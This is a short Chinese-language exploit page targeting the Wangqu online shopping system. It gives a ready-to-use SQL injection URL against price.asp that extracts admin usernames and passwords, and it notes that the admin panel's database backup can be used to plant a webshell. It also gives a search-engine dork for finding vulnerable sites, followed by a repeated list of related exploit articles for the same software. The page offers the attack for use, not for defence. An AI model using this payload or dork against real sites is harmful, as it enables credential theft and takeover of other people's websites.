利用:
price.asp?anid=36%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww
用工具添加表名->cnhww,字段->admin、passwrod
后台可以备份数据库,前台结合可以轻松拿Webshell。
百度、谷歌搜索利用关键字:
inurl:Price.asp?anid=
只显示10条记录相关文章
网趣网站管理系统--上传漏洞 (浏览: 13608, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12720, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15968, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12482, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9735, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10194, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12720, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15968, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12482, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9735, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10194, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)
Trackbacks
 |
 |
 |
